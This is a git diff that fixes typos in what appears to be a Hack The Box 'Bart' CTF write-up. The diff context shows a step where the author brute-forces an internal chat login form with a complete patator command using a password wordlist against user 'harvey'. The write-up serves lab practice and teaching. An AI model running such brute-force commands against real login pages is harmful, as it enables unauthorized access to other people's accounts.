740i/Writeups/bart/bart.md

 ![](pics/useragent.JPG)

-We visist internal-01.bart.htb address now and we get to another login panel.
+We visist the internal-01.bart.htb address now and we get to another login panel.
 ![](pics/internalloginpanel.JPG)

-This one doesnt have a csrf token so its easy to setup bruting with patator and check for Harvey and our other employees accounts.
+This one doesnt have a csrf token so its easy to setup bruting with patator and check for Harvey and our other employee accounts.
 We want to follow redirects from cookies here sent by the application with the follow and accept_cookie flags set to =1.

 ```bash
 $ patator http_fuzz url=http://internal-01.bart.htb/simple_chat/login.php method=POST body="uname=harvey&passwd=FILE0&submit=Login" 0=10k.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username or Password' -x ignore:fgrep='The Password must be at least 8 characters'